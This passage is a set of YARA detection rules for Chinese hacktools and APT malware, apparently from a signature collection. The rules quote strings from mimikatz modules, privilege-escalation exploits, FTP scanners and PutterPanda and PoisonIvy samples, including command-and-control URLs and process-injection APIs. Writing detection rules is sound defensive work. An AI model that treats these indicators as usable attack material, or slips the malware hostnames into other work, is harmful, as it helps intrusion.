+      description = "Chinese Hacktool Set - file portscanner_RID2BC0.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:19:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PortListfNo" fullword ascii
+      $s1 = ".533.net" fullword ascii
+      $s2 = "CRTDLL.DLL" fullword ascii
+      $s3 = "exitfc" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 25KB and all of them
+}
+
+rule kappfree_RID2A5F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file kappfree_RID2A5F.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 05:30:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Bienvenue dans un processus distant" fullword wide
+      $s2 = "kappfree_RID2A5F.dll" fullword ascii
+      $s3 = "kappfree_RID2A5F de mimikatz pour Windows (anti AppLocker)" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule Smartniff_RID2ABB : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Smartniff_RID2ABB.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:03:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "smsniff.exe" fullword wide
+      $s2 = "support@nirsoft.net0" fullword ascii
+      $s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule KiwiTaskmgr_2_RID2C0F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:33:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+      $s2 = "Kiwi Taskmgr no-gpo" fullword wide
+      $s3 = "KiwiAndTaskMgr" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule kappfree_2_RID2AF0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file kappfree.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:31:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "kappfree.dll" fullword ascii
+      $s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
+      $s3 = "' introuvable !" fullword wide
+      $s4 = "kiwi\\mimikatz" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule x_way2_5_sqlcmd_RID2CE2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file sqlcmd.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:08:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LOADER ERROR" fullword ascii
+      $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+      $s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+      $s4 = "kernel32.dll" fullword ascii
+      $s5 = "VirtualAlloc" fullword ascii
+      $s6 = "VirtualFree" fullword ascii
+      $s7 = "VirtualProtect" fullword ascii
+      $s8 = "ExitProcess" fullword ascii
+      $s9 = "user32.dll" fullword ascii
+      $s10 = "MessageBoxA" fullword ascii
+      $s12 = "wsprintfA" fullword ascii
+      $s13 = "kernel32.dll" fullword ascii
+      $s14 = "GetProcAddress" fullword ascii
+      $s15 = "GetModuleHandleA" fullword ascii
+      $s16 = "LoadLibraryA" fullword ascii
+      $s17 = "odbc32.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
+}
+
+rule Win32_klock_RID2B17 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file klock.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:51:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "klock.dll" fullword ascii
+      $s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
+      $s3 = "klock de mimikatz pour Windows" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and all of them
+}
+
+rule ipsearcher_RID2B37 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ipsearcher_RID2B37.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:57:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://www.wzpg.com" fullword ascii
+      $s1 = "ipsearcher_RID2B37\\ipsearcher_RID2B37\\Release\\ipsearcher_RID2B37.pdb" ascii
+      $s3 = "_GetAddress" fullword ascii
+      $s5 = "ipsearcher_RID2B37.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 140KB and all of them
+}
+
+rule ms10048_x64_RID2A2F : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ms10048-x64.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 04:10:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "The target is most likely patched." fullword ascii
+      $s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
+      $s3 = "[ ] Creating evil window" fullword ascii
+      $s4 = "[+] Set to %d exploit half succeeded" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+}
+
+rule hscangui_RID2A63 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hscangui_RID2A63.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 05:36:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+      $s2 = "http://www.cnhonker.com" fullword ascii
+      $s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
+      $s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+}
+
+rule GoodToolset_ms11080_RID2DBD : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ms11080.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:44:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] command add user 90sec 90sec" fullword ascii
+      $s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii
+      $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+      $s4 = "[*] Add to Administrators success" fullword ascii
+      $s5 = "[*] User has been successfully added" fullword ascii
+      $s6 = "[>] ms11-08 Exploit" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+}
+
+rule epathobj_exp64_RID2C74 : CHINA DEMO EXE FILE HKTL T1068 {
+   meta:
+      description = "Chinese Hacktool Set - file epathobj_exp64_RID2C74.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:49:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
+      $s2 = "Exploit ok run command" fullword ascii
+      $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii
+      $s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+      $s5 = "Mutex object did not timeout, list not patched" fullword ascii
+      $s6 = "- inconsistent onexit begin-end variables" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+}
+
+rule kelloworld_2_RID2BE1 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file kelloworld.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:25:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Hello World!" fullword wide
+      $s2 = "kelloworld.dll" fullword ascii
+      $s3 = "kelloworld de mimikatz pour Windows" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule HScan_v1_20_hscan_RID2D11 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hscan.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:16:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+      $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
+      $s3 = ".\\report\\%s-%s.html" fullword ascii
+      $s4 = ".\\log\\Hscan.log" fullword ascii
+      $s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule _Project1_Generate_rejoice_RID3142 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:14:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
+      hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sfUserAppDataRoaming" fullword ascii
+      $s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
+      $s3 = "delphi32.exe" fullword ascii
+      $s4 = "hkeyCurrentUser" fullword ascii
+      $s5 = "%s is not a valid IP address." fullword wide
+      $s6 = "Citadel hooking error" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule _hscan_hscan_hscangui_RID2F9A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 12:04:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
+      hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".\\log\\Hscan.log" fullword ascii
+      $s2 = ".\\report\\%s-%s.html" fullword ascii
+      $s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
+      $s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
+      $s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and all of them
+}
+
+rule Kiwi_Tools_Mimikatz_1_RID2F4A : CHINA DEMO EXE FILE HKTL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Chinese Hacktool Set - from mimikatz files"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:50:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+      hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+      hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
+      $s2 = "Benjamin Delpy" fullword ascii
+      $s3 = "GlobalSign" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule Kiwi_Tools_Mimikatz_2_RID2F4B : CHINA DEMO EXE FILE HKTL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Chinese Hacktool Set - from mimikatz files"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:51:01"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+      hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+      hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mimikatz" fullword wide
+      $s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
+      $s3 = "Gentil Kiwi" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule MAL_Fidelis_Advisory_Purchase_Order_pps_RID3661 : DEMO MAL {
+   meta:
+      description = "Detects a string found in a malicious document named Purchase_Order.pps"
+      author = "Florian Roth"
+      reference = "http://goo.gl/ZjJyti"
+      date = "2015-06-09 16:53:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
+   condition: 
+      all of them
+}
+
+rule PoisonIvy_Sample_APT_RID2EC6 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects a PoisonIvy APT malware group"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 11:28:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "pidll.dll" fullword ascii
+      $s1 = "sens32.dll" fullword wide
+      $s3 = "FileDescription" fullword wide
+      $s4 = "OriginalFilename" fullword wide
+      $s5 = "ZwSetInformationProcess" fullword ascii
+      $s9 = "Microsoft Media Device Service Provider" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 47KB and all of them
+}
+
+rule APT_Malware_PutterPanda_Rel_RID3167 : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects an APT malware related to PutterPanda"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 13:21:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x0 = "app.stream-media.net" fullword ascii
+      $x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii
+      $s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii
+      $s7 = "Connect %s error!" fullword ascii
+      $s9 = "Download file %s successfully!" fullword ascii
+      $s10 = "index.tmp" fullword ascii
+      $s11 = "Execute PE Successfully" fullword ascii
+      $s13 = "aa/22/success.xml" fullword ascii
+      $s16 = "aa/22/index.asp" fullword ascii
+      $s18 = "File %s a Non-Pe File" fullword ascii
+      $s19 = "SendRequset error!" fullword ascii
+      $s20 = "filelist[%d]=%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 4 of ( $s* ) )
+}
+
+rule Regin_Related_Malware_RID2F4E : APT DEMO MAL {
+   meta:
+      description = "Malware Sample - maybe Regin related"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 11:51:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%c%s%c -p %d -e %d -pv -c \"~~[%x] s; .%c%c%s %s /u %s_%d.dmp; q\"" fullword wide
+      $s0 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+      $s2 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+      $s3 = "disp.dll" fullword ascii
+      $s4 = "msvcrtd.dll" fullword ascii
+      $s5 = "%d.%d.%d.%d%c" fullword ascii
+      $s6 = "%ls_%08x" fullword wide
+      $s8 = "d%ls%ls" fullword wide
+      $s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+   condition: 
+      $s1 or 3 of ( $s* )
+}
+
+rule APT_Malware_PutterPanda_Rel_2_RID31F8 : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "APT Malware related to PutterPanda Group"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 13:45:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii
+      $s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii
+      $s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+      $s3 = "Internet connect error:%d" fullword ascii
+      $s4 = "Proxy-Authorization:Basic" fullword ascii
+      $s5 = "HttpQueryInfo failed:%d" fullword ascii
+      $s6 = "read file error:%d" fullword ascii
+      $s7 = "downdll.dll" fullword ascii
+      $s8 = "rz.dat" fullword ascii
+      $s9 = "Invalid url" fullword ascii
+      $s10 = "Create file failed" fullword ascii
+      $s11 = "myAgent" fullword ascii
+      $s12 = "%s%s%d%d" fullword ascii
+      $s13 = "down file success" fullword ascii
+      $s15 = "error!" fullword ascii
+      $s18 = "Avaliable data:%u bytes" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and 6 of them
+}
+
+rule PoisonIvy_Sample_APT_4_RID2F59 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects a PoisonIvy Sample APT"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 11:53:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Microsoft Software installation Service" fullword wide
+      $s1 = "idll.dll" fullword ascii
+      $s2 = "mgmts.dll" fullword wide
+      $s3 = "Microsoft(R) Windows(R)" fullword wide
+      $s4 = "ServiceMain" fullword ascii
+      $s5 = "Software installation Service" fullword wide
+      $s6 = "SetServiceStatus" fullword ascii
+      $s7 = "OriginalFilename" fullword wide
+      $s8 = "ZwSetInformationProcess" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+}
+
+rule APT_Malware_PutterPanda_PSAPI_RID31C1 : APT CHINA DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects a malware related to Putter Panda"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 13:36:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LOADER ERROR" fullword ascii
+      $s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+      $s2 = "psapi.dll" fullword ascii
+      $s3 = "urlmon.dll" fullword ascii
+      $s4 = "WinHttpGetProxyForUrl" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule APT_Malware_PutterPanda_WUAUCLT_RID3269 : APT CHINA DEMO G0024 MAL {
+   meta:
+      description = "Detects a malware related to Putter Panda"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 14:04:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x0 = "WUAUCLT.EXE" fullword wide
+      $x1 = "%s\\tmp%d.exe" fullword ascii
+      $x2 = "Microsoft Corporation. All rights reserved." fullword wide
+      $s1 = "Microsoft Windows Operating System" fullword wide
+      $s2 = "InternetQueryOptionA" fullword ascii
+      $s3 = "LookupPrivilegeValueA" fullword ascii
+      $s4 = "WNetEnumResourceA" fullword ascii
+      $s5 = "HttpSendRequestExA" fullword ascii
+      $s6 = "PSAPI.DLL" fullword ascii
+      $s7 = "Microsoft(R) Windows(R) Operating System" fullword wide
+      $s8 = "CreatePipe" fullword ascii
+      $s9 = "EnumProcessModules" fullword ascii
+   condition: 
+      all of ( $x* ) or ( 1 of ( $x* ) and all of ( $s* ) )
+}
+
+rule PoisonIvy_Sample_7_RID2E18 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects PoisonIvy RAT sample set"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 10:59:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Microsoft Software installation Service" fullword wide
+      $s2 = "pidll.dll" fullword ascii
+      $s10 = "ServiceMain" fullword ascii
+      $s11 = "ZwSetInformationProcess" fullword ascii
+      $s12 = "Software installation Service" fullword wide
+      $s13 = "Microsoft(R) Windows(R) Operating System" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule APT_Malware_PutterPanda_Gen1_RID318F : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects a malware "
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2015-06-03 13:27:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
+      hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii
+      $s2 = "ssdpsvc.dll" fullword ascii
+      $s3 = "Fail %s " fullword ascii
+      $s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii
+      $s5 = "LsaServiceInit" fullword ascii
+      $s6 = "%-8d Fs %-12s Bs " fullword ascii
+      $s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+}
+
+rule Malware_MsUpdater_String_in_EXE_RID331B : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "MSUpdater String in Executable"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 14:33:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "msupdate.exe" fullword wide
+      $x3 = "msupdater.exe" fullword ascii
+      $x4 = "msupdater32.exe" fullword ascii
+      $x5 = "msupdater32.exe" fullword wide
+      $x6 = "msupdate.pif" fullword ascii
+      $fp1 = "_msupdate_" wide
+      $fp2 = "_msupdate_" ascii
+      $fp3 = "/kies" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) ) and not ( 1 of ( $fp* ) )
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_3_RID346B : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects Malware related to PutterPanda - MSUpdater"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 15:29:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "msupdater.exe" fullword ascii
+      $s1 = "Explorer.exe \"" fullword ascii
+      $s2 = "FAVORITES.DAT" fullword ascii
+      $s4 = "COMSPEC" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and 3 of them
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_1_RID3469 : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects Malware related to PutterPanda - MSUpdater"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 15:29:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x0 = "msupdate.exe" fullword wide
+      $x1 = "msupdate" fullword wide
+      $s1 = "Microsoft Corporation. All rights reserved." fullword wide
+      $s2 = "Automatic Updates" fullword wide
+      $s3 = "VirtualProtectEx" fullword ascii
+      $s4 = "Invalid parameter" fullword ascii
+      $s5 = "VirtualAllocEx" fullword ascii
+      $s6 = "WriteProcessMemory" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and 1 of ( $x* ) and 4 of ( $s* ) ) or ( 1 of ( $x* ) and all of ( $s* ) )
+}
+
+rule APT_Malware_PutterPanda_MsUpdater_2_RID346A : APT DEMO EXE FILE G0024 MAL {
+   meta:
+      description = "Detects Malware related to PutterPanda - MSUpdater"
+      author = "Florian Roth"
+      reference = "VT Analysis"
+      date = "2015-06-03 15:29:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0024, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "winsta0\\default" fullword ascii
+      $s1 = "EXPLORER.EXE" fullword ascii
+      $s2 = "WNetEnumResourceA" fullword ascii
+      $s3 = "explorer.exe" fullword ascii
